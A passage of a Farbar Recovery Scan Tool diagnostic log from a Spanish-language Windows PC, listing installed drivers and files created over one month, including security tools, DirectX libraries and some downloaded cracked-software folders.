S0 MbamElam; C:\WINDOWS\System32\DRIVERS\MbamElam.sys [20936 2020-05-08] (Microsoft Windows Early Launch Anti-malware Publisher -> Malwarebytes)
R3 MBAMSwissArmy; C:\WINDOWS\System32\Drivers\mbamswissarmy.sys [248968 2020-05-09] (Malwarebytes Inc -> Malwarebytes)
R3 necbatt; C:\WINDOWS\System32\drivers\necbatt.sys [34880 2018-05-09] (NEC Personal Computers, Ltd. -> NEC Personal Computers, Ltd.)
S3 ptun0901; C:\WINDOWS\System32\drivers\ptun0901.sys [27136 2014-08-08] (OpenVPN Technologies, Inc. -> The OpenVPN Project)
R3 rt640x64; C:\WINDOWS\System32\drivers\rt640x64.sys [1158944 2019-08-21] (Realtek Semiconductor Corp. -> Realtek )
R3 RtkA2dp; C:\WINDOWS\system32\drivers\RtkA2dp.sys [199624 2018-06-25] (Realtek Semiconductor Corp. -> Realtek Semiconductor Corporation)
R3 RtkAvrcp; C:\WINDOWS\System32\drivers\RtkAvrcp.sys [71104 2018-03-22] (Realtek Semiconductor Corp. -> Realtek Semiconductor Corporation)
R3 RtkAvrcpCtrlr; C:\WINDOWS\System32\drivers\RtkAvrcpCtrlr.sys [70672 2015-05-12] (Microsoft Windows Hardware Compatibility Publisher -> Realtek Semiconductor Corporation)
R3 RtkBtFilter; C:\WINDOWS\System32\drivers\RtkBtfilter.sys [779104 2019-05-20] (Realtek Semiconductor Corp. -> Realtek Semiconductor Corporation)
R3 RTSUER; C:\WINDOWS\system32\Drivers\RtsUer.sys [424384 2019-08-21] (Realtek Semiconductor Corp. -> Realsil Semiconductor Corporation)
R3 rtsuvc; C:\WINDOWS\system32\DRIVERS\rtsuvc.sys [3138048 2017-04-24] (Realtek Semiconductor Corp. -> Realtek Semiconductor Corp.)
R3 RTWlanE; C:\WINDOWS\system32\DRIVERS\rtwlane.sys [8094960 2018-10-12] (Realtek Semiconductor Corp. -> Realtek Semiconductor Corporation )
S3 RTWlanE01; C:\WINDOWS\System32\drivers\rtwlane01.sys [8169472 2019-03-19] (Microsoft Windows -> Realtek Semiconductor Corporation )
S3 SzCCID; C:\WINDOWS\system32\DRIVERS\SzCCID.sys [37888 2010-05-14] (Microsoft Windows Hardware Compatibility Publisher -> Generic)
R3 taphss6; C:\WINDOWS\System32\drivers\taphss6.sys [42064 2017-03-01] (AnchorFree Inc -> Anchorfree Inc.)
S0 WdBoot; C:\WINDOWS\System32\drivers\wd\WdBoot.sys [45664 2019-12-08] (Microsoft Windows Early Launch Anti-malware Publisher -> Microsoft Corporation)
R0 WdFilter; C:\WINDOWS\System32\drivers\wd\WdFilter.sys [355760 2019-12-08] (Microsoft Windows -> Microsoft Corporation)
S3 WdNisDrv; C:\WINDOWS\System32\drivers\wd\WdNisDrv.sys [54192 2019-12-08] (Microsoft Windows -> Microsoft Corporation)
S3 wsvd; C:\WINDOWS\system32\DRIVERS\wsvd.sys [102376 2012-06-13] (CyberLink -> "CyberLink)
S3 AscFileFilter; \??\C:\Program Files (x86)\IObit\Advanced SystemCare Ultimate\drivers\win10_amd64\AscFileFilter.sys [X]
S3 AscRegistryFilter; \??\C:\Program Files (x86)\IObit\Advanced SystemCare Ultimate\drivers\win10_amd64\AscRegistryFilter.sys [X]
U3 aswbdisk; no ImagePath
U3 avgbdisk; no ImagePath
S3 cpuz145; \??\C:\WINDOWS\temp\cpuz145\cpuz145_x64.sys [X]

==================== NetSvcs (Lista blanca) ===================

(Si una entrada es incluida en el fixlist, será eliminada del registro. El archivo no se moverá a menos que sea añadido al listado por separado.)


==================== Un mes (creado) ===================

(Si una entrada es incluida en el fixlist, el archivo/carpeta será eliminado/a.)

2020-05-10 11:54 - 2020-05-10 11:56 - 000029491 _____ C:\Users\Javi\Downloads\FRST.txt
2020-05-10 11:54 - 2020-05-10 11:54 - 000000000 ____D C:\Users\Javi\Downloads\FRST-OlderVersion
2020-05-10 11:53 - 2020-05-10 11:55 - 000000000 ____D C:\FRST
2020-05-10 11:49 - 2020-05-10 11:53 - 000001048 _____ C:\Users\Javi\Desktop\FRST64.lnk
2020-05-10 10:23 - 2020-05-10 10:23 - 000003110 _____ C:\WINDOWS\system32\Tasks\AMDLinkUpdate
2020-05-10 00:17 - 2020-05-10 11:54 - 002284032 _____ (Farbar) C:\Users\Javi\Downloads\FRST64.exe
2020-05-09 18:29 - 2020-05-09 18:30 - 000000000 ____D C:\Users\Javi\Downloads\20200509 CERNICALO PRIMILLA
2020-05-09 15:19 - 2020-05-09 15:19 - 000006502 _____ C:\Users\Javi\Downloads\cc_20200509_151915.reg
2020-05-09 15:04 - 2020-05-09 15:04 - 000205468 _____ C:\Users\Javi\Downloads\cc_20200509_150423.reg
2020-05-09 14:25 - 2020-05-09 14:25 - 000248968 _____ (Malwarebytes) C:\WINDOWS\system32\Drivers\mbamswissarmy.sys
2020-05-09 13:26 - 2020-05-09 13:26 - 000003936 _____ C:\WINDOWS\system32\Tasks\CCleaner Update
2020-05-09 13:26 - 2020-05-09 13:26 - 000002886 _____ C:\WINDOWS\system32\Tasks\CCleanerSkipUAC
2020-05-09 13:26 - 2020-05-09 13:26 - 000000870 _____ C:\Users\Public\Desktop\CCleaner.lnk
2020-05-09 13:26 - 2020-05-09 13:26 - 000000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\CCleaner
2020-05-09 13:26 - 2020-05-09 13:26 - 000000000 ____D C:\Program Files\CCleaner
2020-05-09 13:23 - 2020-05-09 13:24 - 022267336 _____ (Piriform Software Ltd) C:\Users\Javi\Downloads\ccsetup565.exe
2020-05-09 12:53 - 2020-05-09 13:29 - 000021217 _____ C:\Users\Javi\Downloads\MALWAREBYTES.odt
2020-05-09 12:47 - 2020-05-09 13:01 - 000001634 _____ C:\Users\Javi\Desktop\adwcleaner_8.0.4.lnk
2020-05-09 12:46 - 2020-05-09 13:08 - 000000000 ____D C:\AdwCleaner
2020-05-09 12:44 - 2020-05-09 12:44 - 008196784 _____ (Malwarebytes) C:\Users\Javi\Downloads\adwcleaner_8.0.4.exe
2020-05-09 12:38 - 2020-05-09 12:38 - 000000000 ____D C:\WINDOWS\system32\Tasks\Mozilla
2020-05-09 10:34 - 2020-05-09 12:55 - 000000000 ____D C:\Program Files (x86)\Mozilla Firefox
2020-05-08 16:09 - 2020-05-08 16:09 - 000014172 _____ C:\Users\Javi\Downloads\DESCUENTO SEGURO COCHE.odt
2020-05-08 15:57 - 2020-05-08 15:57 - 000000000 ____D C:\Users\Javi\Downloads\semana 11 05 lunes creo k persanas de riesgo no deben de ir a trabajar, ni siquiera como minimo dan la opcion de no ir vluntariamente
2020-05-08 14:58 - 2020-05-09 11:15 - 000000000 ____D C:\Users\Javi\Downloads\20200508 MILANO NEGRO
2020-05-08 12:49 - 2020-05-08 12:49 - 000214496 _____ (Malwarebytes) C:\WINDOWS\system32\Drivers\MbamChameleon.sys
2020-05-08 12:49 - 2020-05-08 12:49 - 000002040 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Malwarebytes.lnk
2020-05-08 12:49 - 2020-05-08 12:49 - 000002028 _____ C:\Users\Public\Desktop\Malwarebytes.lnk
2020-05-08 12:49 - 2020-05-08 12:48 - 000020936 _____ (Malwarebytes) C:\WINDOWS\system32\Drivers\MbamElam.sys
2020-05-08 12:41 - 2020-05-08 12:41 - 000000000 __SHD C:\ProgramData\360Quarant
2020-05-08 11:14 - 2020-05-08 11:14 - 000001086 _____ C:\Users\Public\Desktop\Revo Uninstaller.lnk
2020-05-08 11:14 - 2020-05-08 11:14 - 000000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Revo Uninstaller
2020-05-08 11:14 - 2020-05-08 11:14 - 000000000 ____D C:\Program Files\VS Revo Group
2020-05-08 11:02 - 2020-05-08 11:02 - 007432520 _____ (VS Revo Group ) C:\Users\Javi\Downloads\revosetup.exe
2020-05-08 10:37 - 2020-05-08 12:48 - 000153312 _____ (Malwarebytes) C:\WINDOWS\system32\Drivers\mbae64.sys
2020-05-08 10:33 - 2020-05-08 10:33 - 001980016 _____ (Malwarebytes) C:\Users\Javi\Downloads\MBSetup.exe
2020-05-07 09:41 - 2020-05-07 09:41 - 000000000 ___HD C:\$SysReset
2020-05-04 19:56 - 2020-05-05 18:51 - 000000214 _____ C:\WINDOWS\Tasks\CreateExplorerShellUnelevatedTask.job
2020-05-04 19:53 - 2020-05-05 19:54 - 000000000 ____D C:\WINDOWS\pss
2020-05-04 19:31 - 2020-05-04 19:31 - 000000000 ____D C:\Users\Javi\AppData\Local\Avg
2020-05-04 19:17 - 2020-05-07 16:39 - 000000000 ____D C:\WINDOWS\system32\Tasks\AVG
2020-05-04 19:17 - 2020-05-05 17:20 - 000000000 ____D C:\Users\Javi\AppData\Roaming\Movavi Photo Editor 6
2020-05-04 19:16 - 2020-05-04 19:16 - 000012696 _____ C:\ProgramData\wiaixvde.uli
2020-05-04 19:16 - 2020-05-04 19:16 - 000000016 _____ C:\ProgramData\mntemp
2020-05-04 19:07 - 2020-05-09 12:32 - 000000000 ____D C:\Users\Javi\Downloads\Movavi Photo Editor v6.4.0.Multilenguaje.ES.inc.Crack-X64
2020-05-04 19:00 - 2020-05-04 19:01 - 062009790 _____ C:\Users\Javi\Downloads\6.4.0.X64.rar
2020-05-04 18:59 - 2020-05-04 18:59 - 000111349 _____ C:\Users\Javi\Downloads\Borrador acuerdo medidas organizativas reincorporación mayo 2020 DEFINITIVO (3).pdf
2020-05-04 18:48 - 2020-05-05 17:22 - 000000000 ____D C:\ProgramData\AVG
2020-05-04 18:47 - 2020-05-05 17:12 - 000000000 ____D C:\Program Files\DIFX
2020-05-04 18:46 - 2020-05-04 18:46 - 000000000 ____D C:\Users\Javi\Downloads\20.2.3116(1)
2020-05-04 18:45 - 2018-10-12 09:27 - 008094960 _____ (Realtek Semiconductor Corporation ) C:\WINDOWS\system32\Drivers\rtwlane.sys
2020-05-04 18:45 - 2018-10-12 09:20 - 000067449 _____ C:\WINDOWS\system32\Drivers\rtldata.txt
2020-05-04 18:45 - 2018-05-09 22:14 - 000034880 _____ (NEC Personal Computers, Ltd.) C:\WINDOWS\system32\Drivers\necbatt.sys
2020-05-04 18:30 - 2020-05-09 13:08 - 000000000 ____D C:\ProgramData\BSD
2020-05-04 18:26 - 2020-05-09 12:24 - 000000000 ____D C:\WINDOWS\system32\Tasks\Auslogics
2020-05-04 18:25 - 2020-05-09 12:24 - 000000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Auslogics
2020-05-04 18:25 - 2020-05-09 12:24 - 000000000 ____D C:\ProgramData\Auslogics
2020-05-04 18:25 - 2020-05-09 12:24 - 000000000 ____D C:\Program Files (x86)\Auslogics
2020-05-04 17:27 - 2020-05-09 12:24 - 000000000 ____D C:\Users\Javi\Downloads\Auslogics.Driver.Updater.v1.24.0.0.Multilenguaje.ES.inc.Crack
2020-05-04 17:25 - 2020-05-04 17:26 - 012376606 _____ C:\Users\Javi\Downloads\1.24.0.0.rar
2020-05-04 15:38 - 2020-05-04 15:39 - 000009184 _____ C:\Users\Javi\Downloads\cc_20200504_153810.reg
2020-05-04 14:29 - 2020-05-07 16:39 - 000000000 ____D C:\WINDOWS\system32\Tasks\Avast Software
2020-05-04 13:44 - 2019-09-19 18:37 - 000000000 ____D C:\Users\Javi\Downloads\NO SE ACTIVA Avast.Internet.Security.2019.v19.8.2393.Multilenguaje.ES.inc.Key
2020-05-04 13:08 - 2020-05-04 16:46 - 000000000 ____D C:\Users\Javi\Downloads\RECUPERACION ARCHIVOS DE TARJETA SD DE NIKON EL 20200504
2020-05-04 12:56 - 2020-05-04 12:56 - 000000000 ____D C:\Users\Javi\Downloads\BORRAR
2020-05-04 10:41 - 2020-05-07 19:21 - 000000000 ____D C:\Users\Javi\AppData\Local\DiskDrill
2020-05-04 10:35 - 2020-05-04 10:35 - 000000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\CleverFiles Disk Drill (x64)
2020-05-04 10:35 - 2020-05-04 10:35 - 000000000 ____D C:\Program Files\CleverFiles
2020-05-04 10:34 - 2020-05-04 10:34 - 000000000 ____D C:\Program Files\Dokan
2020-05-04 10:34 - 2018-08-09 07:54 - 000104312 _____ (Dokan Project) C:\WINDOWS\system32\Drivers\dokan1.sys
2020-05-03 21:48 - 2020-05-04 20:27 - 000000000 ____D C:\Users\Javi\AppData\Roaming\87aaec1fa3e1
2020-05-03 20:59 - 2020-05-03 20:59 - 000193346 _____ C:\Users\Javi\Downloads\COPIA SEGUR REGISTRO cc_20200503_205856.reg
2020-05-03 19:48 - 2020-05-03 19:48 - 000000000 ____D C:\Program Files\EaseUS
2020-05-03 19:25 - 2020-05-03 19:25 - 000000000 ____D C:\Users\Javi\AppData\LocalLow\ProductData
2020-05-03 17:08 - 2020-05-09 13:08 - 000000000 ____D C:\Users\Javi\AppData\LocalLow\IObit
2020-05-03 17:07 - 2020-05-03 17:11 - 000000000 ____D C:\ProgramData\ProductData
2020-05-03 17:07 - 2020-05-03 17:07 - 000000000 ____D C:\WINDOWS\Tasks\ImCleanDisabled
2020-05-03 17:07 - 2020-05-03 17:07 - 000000000 ____D C:\ProgramData\{D76294E6-03B8-4971-AF2E-3F846161A690}
2020-05-03 17:07 - 2020-05-03 17:07 - 000000000 ____D C:\ProgramData\{2F8AE550-5F50-4773-BF82-805D99AD42B5}
2020-05-03 17:00 - 2020-05-09 13:08 - 000000000 ____D C:\Users\Javi\AppData\Roaming\IObit
2020-05-03 17:00 - 2020-05-09 13:08 - 000000000 ____D C:\ProgramData\IObit
2020-05-03 17:00 - 2020-05-03 17:00 - 000000000 ____D C:\Program Files (x86)\IObit
2020-05-03 16:58 - 2020-04-26 11:49 - 000000000 ____D C:\Users\Javi\Downloads\COGER OTRO Advanced SystemCare Ultimate v13.2.0.132.Multilenguaje.ES.inc.Crack
2020-05-03 16:48 - 2020-05-03 16:48 - 000000000 ____D C:\Users\Javi\Desktop\JUEGOS UPLAY
2020-05-03 16:48 - 2020-05-03 16:48 - 000000000 ____D C:\Users\Javi\Desktop\JUEGOS FX STORE
2020-05-03 16:47 - 2020-05-08 12:46 - 000000000 ____D C:\Users\Javi\Desktop\ANTIVIRUS Y OPTIMIZADORES
2020-05-03 16:45 - 2020-05-03 16:46 - 000000000 ____D C:\Users\Javi\Desktop\JUEGOS REGULARES
2020-05-03 15:18 - 2020-05-05 17:21 - 000000000 ____D C:\ProgramData\AVAST Software
2020-05-03 15:17 - 2020-02-29 16:33 - 000000000 ____D C:\Users\Javi\Downloads\COGER OTROAvast.Premium.Security.v20.1.2397.Multilenguaje.ES.inc.Licencia
2020-05-03 12:54 - 2020-04-28 23:50 - 000000000 ____D C:\Users\Javi\Downloads\COGER OTRO EaseUS.Data.Recovery.Wizard.Tech.13.3.Multilenguaje.ES.inc.Crack.Keygen
2020-05-03 11:32 - 2020-05-04 12:55 - 000000000 ____D C:\ProgramData\Wondershare Filmora
2020-05-03 11:04 - 2020-05-03 11:04 - 000000000 ____D C:\Users\Javi\AppData\Roaming\Ubisoft
2020-05-02 19:13 - 2020-05-02 19:14 - 000000000 ____D C:\Users\Javi\Documents\Rayman Legends
2020-05-02 13:15 - 2010-06-02 04:55 - 000176984 _____ (Microsoft Corporation) C:\WINDOWS\system32\xactengine3_7.dll
2020-05-02 13:15 - 2010-02-04 10:01 - 000530776 _____ (Microsoft Corporation) C:\WINDOWS\system32\XAudio2_6.dll
2020-05-02 13:15 - 2010-02-04 10:01 - 000078680 _____ (Microsoft Corporation) C:\WINDOWS\system32\XAPOFX1_4.dll
2020-05-02 13:14 - 2010-02-04 10:01 - 000176984 _____ (Microsoft Corporation) C:\WINDOWS\system32\xactengine3_6.dll
2020-05-02 13:14 - 2009-09-04 17:44 - 000517960 _____ (Microsoft Corporation) C:\WINDOWS\system32\XAudio2_5.dll
2020-05-02 13:14 - 2009-09-04 17:44 - 000176968 _____ (Microsoft Corporation) C:\WINDOWS\system32\xactengine3_5.dll
2020-05-02 13:14 - 2009-09-04 17:29 - 005554512 _____ (Microsoft Corporation) C:\WINDOWS\system32\d3dcsx_42.dll
2020-05-02 13:14 - 2009-09-04 17:29 - 002582888 _____ (Microsoft Corporation) C:\WINDOWS\system32\D3DCompiler_42.dll
2020-05-02 13:14 - 2009-09-04 17:29 - 002475352 _____ (Microsoft Corporation) C:\WINDOWS\system32\D3DX9_42.dll
2020-05-02 13:14 - 2009-09-04 17:29 - 000285024 _____ (Microsoft Corporation) C:\WINDOWS\system32\d3dx11_42.dll
2020-05-02 13:14 - 2009-03-09 15:27 - 005425496 _____ (Microsoft Corporation) C:\WINDOWS\system32\D3DX9_41.dll
2020-05-02 13:14 - 2009-03-09 15:27 - 002430312 _____ (Microsoft Corporation) C:\WINDOWS\system32\D3DCompiler_41.dll
2020-05-02 13:14 - 2009-03-09 15:27 - 000520544 _____ (Microsoft Corporation) C:\WINDOWS\system32\d3dx10_41.dll
2020-05-02 13:13 - 2009-09-04 17:44 - 000073544 _____ (Microsoft Corporation) C:\WINDOWS\system32\XAPOFX1_3.dll
2020-05-02 13:13 - 2009-03-16 14:18 - 000521560 _____ (Microsoft Corporation) C:\WINDOWS\system32\XAudio2_4.dll
2020-05-02 13:13 - 2009-03-16 14:18 - 000174936 _____ (Microsoft Corporation) C:\WINDOWS\system32\xactengine3_4.dll
2020-05-02 13:13 - 2009-03-16 14:18 - 000024920 _____ (Microsoft Corporation) C:\WINDOWS\system32\X3DAudio1_6.dll
2020-05-02 13:13 - 2008-10-27 10:04 - 000518480 _____ (Microsoft Corporation) C:\WINDOWS\system32\XAudio2_3.dll
2020-05-02 13:13 - 2008-10-27 10:04 - 000175440 _____ (Microsoft Corporation) C:\WINDOWS\system32\xactengine3_3.dll
2020-05-02 13:13 - 2008-10-27 10:04 - 000074576 _____ (Microsoft Corporation) C:\WINDOWS\system32\XAPOFX1_2.dll
2020-05-02 13:13 - 2008-10-27 10:04 - 000025936 _____ (Microsoft Corporation) C:\WINDOWS\system32\X3DAudio1_5.dll
2020-05-02 13:13 - 2008-10-15 06:22 - 005631312 _____ (Microsoft Corporation) C:\WINDOWS\system32\D3DX9_40.dll
2020-05-02 13:13 - 2008-10-15 06:22 - 002605920 _____ (Microsoft Corporation) C:\WINDOWS\system32\D3DCompiler_40.dll
2020-05-02 13:13 - 2008-10-15 06:22 - 000519000 _____ (Microsoft Corporation) C:\WINDOWS\system32\d3dx10_40.dll
2020-05-02 13:12 - 2008-07-31 10:41 - 000177672 _____ (Microsoft Corporation) C:\WINDOWS\system32\xactengine3_2.dll
2020-05-02 13:12 - 2008-07-31 10:41 - 000072200 _____ (Microsoft Corporation) C:\WINDOWS\system32\XAPOFX1_1.dll
2020-05-02 13:12 - 2008-07-31 10:40 - 000513544 _____ (Microsoft Corporation) C:\WINDOWS\system32\XAudio2_2.dll
2020-05-02 13:12 - 2008-07-10 11:00 - 004992520 _____ (Microsoft Corporation) C:\WINDOWS\system32\D3DX9_39.dll
2020-05-02 13:12 - 2008-07-10 11:00 - 001942552 _____ (Microsoft Corporation) C:\WINDOWS\system32\D3DCompiler_39.dll
2020-05-02 13:12 - 2008-07-10 11:00 - 000540688 _____ (Microsoft Corporation) C:\WINDOWS\system32\d3dx10_39.dll
2020-05-02 13:12 - 2008-05-30 14:19 - 000511496 _____ (Microsoft Corporation) C:\WINDOWS\system32\XAudio2_1.dll
2020-05-02 13:12 - 2008-05-30 14:18 - 000177672 _____ (Microsoft Corporation) C:\WINDOWS\system32\xactengine3_1.dll
2020-05-02 13:12 - 2008-05-30 14:17 - 000068104 _____ (Microsoft Corporation) C:\WINDOWS\system32\XAPOFX1_0.dll
2020-05-02 13:12 - 2008-05-30 14:16 - 000028168 _____ (Microsoft Corporation) C:\WINDOWS\system32\X3DAudio1_4.dll
2020-05-02 13:12 - 2008-05-30 14:11 - 001941528 _____ (Microsoft Corporation) C:\WINDOWS\system32\D3DCompiler_38.dll
2020-05-02 13:12 - 2008-05-30 14:11 - 000540688 _____ (Microsoft Corporation) C:\WINDOWS\system32\d3dx10_38.dll
2020-05-02 13:11 - 2008-05-30 14:11 - 004991496 _____ (Microsoft Corporation) C:\WINDOWS\system32\D3DX9_38.dll
2020-05-02 13:11 - 2008-03-05 16:04 - 000489480 _____ (Microsoft Corporation) C:\WINDOWS\system32\XAudio2_0.dll
2020-05-02 13:11 - 2008-03-05 16:03 - 000177672 _____ (Microsoft Corporation) C:\WINDOWS\system32\xactengine3_0.dll
2020-05-02 13:11 - 2008-03-05 16:00 - 000028168 _____ (Microsoft Corporation) C:\WINDOWS\system32\X3DAudio1_3.dll
2020-05-02 13:11 - 2008-03-05 15:56 - 004910088 _____ (Microsoft Corporation) C:\WINDOWS\system32\D3DX9_37.dll
2020-05-02 13:11 - 2008-03-05 15:56 - 001860120 _____ (Microsoft Corporation) C:\WINDOWS\system32\D3DCompiler_37.dll
2020-05-02 13:11 - 2008-02-05 23:07 - 000529424 _____ (Microsoft Corporation) C:\WINDOWS\system32\d3dx10_37.dll
2020-05-02 13:11 - 2007-10-22 03:40 - 000411656 _____ (Microsoft Corporation) C:\WINDOWS\system32\xactengine2_10.dll
2020-05-02 13:11 - 2007-10-22 03:37 - 000021000 _____ (Microsoft Corporation) C:\WINDOWS\system32\X3DAudio1_2.dll
2020-05-02 13:11 - 2007-10-12 15:14 - 005081608 _____ (Microsoft Corporation) C:\WINDOWS\system32\d3dx9_36.dll
2020-05-02 13:11 - 2007-10-12 15:14 - 002006552 _____ (Microsoft Corporation) C:\WINDOWS\system32\D3DCompiler_36.dll
2020-05-02 13:11 - 2007-10-02 09:56 - 000508264 _____ (Microsoft Corporation) C:\WINDOWS\system32\d3dx10_36.dll
2020-05-02 13:10 - 2007-03-05 12:42 - 000017688 _____ (Microsoft Corporation) C:\WINDOWS\system32\x3daudio1_1.dll
2020-05-02 12:03 - 2020-05-02 19:50 - 000000000 ____D C:\Users\Javi\Downloads\SELECCION FOTOS PARIS
2020-05-01 21:30 - 2020-05-01 21:30 - 000000000 ____D C:\Users\Javi\Documents\My Games
2020-05-01 21:27 - 2010-06-02 04:55 - 000239960 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\xactengine3_7.dll
2020-05-01 21:27 - 2010-02-04 10:01 - 000528216 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\XAudio2_6.dll
2020-05-01 21:27 - 2010-02-04 10:01 - 000238936 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\xactengine3_6.dll
2020-05-01 21:27 - 2010-02-04 10:01 - 000074072 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\XAPOFX1_4.dll
2020-05-01 21:27 - 2009-09-04 17:44 - 000515416 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\XAudio2_5.dll
2020-05-01 21:27 - 2009-09-04 17:44 - 000238936 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\xactengine3_5.dll
2020-05-01 21:27 - 2009-09-04 17:44 - 000069464 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\XAPOFX1_3.dll
2020-05-01 21:27 - 2009-09-04 17:29 - 005501792 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\d3dcsx_42.dll
2020-05-01 21:27 - 2009-09-04 17:29 - 001974616 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\D3DCompiler_42.dll
2020-05-01 21:27 - 2009-09-04 17:29 - 001892184 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\D3DX9_42.dll
2020-05-01 21:27 - 2009-09-04 17:29 - 000235344 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\d3dx11_42.dll
2020-05-01 21:27 - 2009-03-16 14:18 - 000517448 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\XAudio2_4.dll
2020-05-01 21:27 - 2009-03-16 14:18 - 000235352 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\xactengine3_4.dll
2020-05-01 21:27 - 2009-03-16 14:18 - 000022360 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\X3DAudio1_6.dll
2020-05-01 21:27 - 2009-03-09 15:27 - 004178264 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\D3DX9_41.dll
2020-05-01 21:27 - 2008-10-27 10:04 - 000514384 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\XAudio2_3.dll
2020-05-01 21:27 - 2008-10-27 10:04 - 000235856 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\xactengine3_3.dll
2020-05-01 21:27 - 2008-10-27 10:04 - 000070992 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\XAPOFX1_2.dll
2020-05-01 21:27 - 2008-10-27 10:04 - 000023376 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\X3DAudio1_5.dll
2020-05-01 21:27 - 2008-10-15 06:22 - 004379984 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\D3DX9_40.dll
2020-05-01 21:27 - 2008-10-15 06:22 - 002036576 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\D3DCompiler_40.dll
2020-05-01 21:27 - 2008-10-15 06:22 - 000452440 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\d3dx10_40.dll
2020-05-01 21:27 - 2008-07-31 10:41 - 000238088 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\xactengine3_2.dll
2020-05-01 21:27 - 2008-07-31 10:41 - 000068616 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\XAPOFX1_1.dll
2020-05-01 21:27 - 2008-07-31 10:40 - 000509448 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\XAudio2_2.dll
2020-05-01 21:27 - 2008-07-10 11:01 - 000467984 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\d3dx10_39.dll
2020-05-01 21:27 - 2008-07-10 11:00 - 003851784 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\D3DX9_39.dll
2020-05-01 21:27 - 2008-07-10 11:00 - 001493528 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\D3DCompiler_39.dll
2020-05-01 21:27 - 2008-05-30 14:19 - 000507400 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\XAudio2_1.dll
2020-05-01 21:27 - 2008-05-30 14:18 - 000238088 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\xactengine3_1.dll
2020-05-01 21:27 - 2008-05-30 14:17 - 000065032 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\XAPOFX1_0.dll
2020-05-01 21:27 - 2008-05-30 14:17 - 000025608 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\X3DAudio1_4.dll
2020-05-01 21:27 - 2008-05-30 14:11 - 003850760 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\D3DX9_38.dll
2020-05-01 21:27 - 2008-05-30 14:11 - 001491992 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\D3DCompiler_38.dll
2020-05-01 21:27 - 2008-05-30 14:11 - 000467984 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\d3dx10_38.dll
2020-05-01 21:27 - 2008-03-05 16:03 - 000479752 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\XAudio2_0.dll
2020-05-01 21:27 - 2008-03-05 16:03 - 000238088 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\xactengine3_0.dll
2020-05-01 21:27 - 2008-03-05 16:00 - 000025608 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\X3DAudio1_3.dll
2020-05-01 21:27 - 2008-03-05 15:56 - 003786760 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\D3DX9_37.dll
2020-05-01 21:27 - 2008-03-05 15:56 - 001420824 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\D3DCompiler_37.dll
2020-05-01 21:27 - 2008-02-05 23:07 - 000462864 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\d3dx10_37.dll
2020-05-01 21:27 - 2007-10-22 03:39 - 000267272 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\xactengine2_10.dll
2020-05-01 21:27 - 2007-10-22 03:37 - 000017928 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\X3DAudio1_2.dll
2020-05-01 21:27 - 2007-10-12 15:14 - 003734536 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\d3dx9_36.dll
2020-05-01 21:27 - 2007-10-12 15:14 - 001374232 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\D3DCompiler_36.dll
2020-05-01 21:27 - 2007-10-02 09:56 - 000444776 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\d3dx10_36.dll
2020-05-01 19:22 - 2020-05-03 11:04 - 000000000 ____D C:\ProgramData\Ubisoft
2020-05-01 19:21 - 2020-05-04 19:23 - 000000000 ____D C:\Users\Javi\AppData\Local\Ubisoft Game Launcher
2020-05-01 19:21 - 2020-05-01 19:21 - 000000000 ____D C:\Users\Javi\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Ubisoft
2020-05-01 19:20 - 2020-05-01 19:20 - 000000000 ____D C:\Program Files (x86)\Ubisoft
2020-05-01 19:16 - 2020-05-01 19:18 - 130318128 _____ (Ubisoft) C:\Users\Javi\Downloads\UplayInstaller.exe
2020-04-30 18:30 - 2020-04-30 18:30 - 000000000 ____D C:\Program Files (x86)\MunSoft
2020-04-30 12:14 - 2020-04-30 12:14 - 000000000 ____D C:\Users\Javi\Downloads\HE COPIADO LA CARPETA FOTOS COPIAS DE FOTOS Y VIDEOS A LA CARPETA FOTOS DE DESCARGAS
